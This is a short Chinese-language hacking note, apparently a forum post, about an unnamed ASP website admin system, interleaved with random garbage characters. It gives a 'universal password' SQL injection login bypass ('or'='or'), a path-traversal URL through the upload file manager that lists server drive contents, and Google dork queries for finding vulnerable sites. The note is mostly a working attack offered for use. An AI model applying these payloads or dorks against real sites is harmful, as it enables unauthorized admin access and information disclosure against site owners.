后台万能密码 'or'='or'
, s9 n9 c) {. ~, _5 T1 J5 p5 j
* M" D/ M9 f) d后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# Y9 E( ?2 j m1 E ` A q. {2 vadmin/uploadfile.asp?currentFolder=/upfiles/../
; v$ J( X( g/ ^& X8 M: ` r/ l' c2 G! [
漏洞证明:
, n0 r- q0 I' n; F% g5 y9 I8 z
( o2 q6 c3 k4 X谷歌:inurl:type.asp?id=1 新闻中心1 }% V) d! P" ^ F& d1 ^7 U
或者 :inurl:download_ok.asp?
% k' q; _' U5 u" L y; Y) p+ S' ~6 s+ l0 h' N1 x: H8 s }& O
|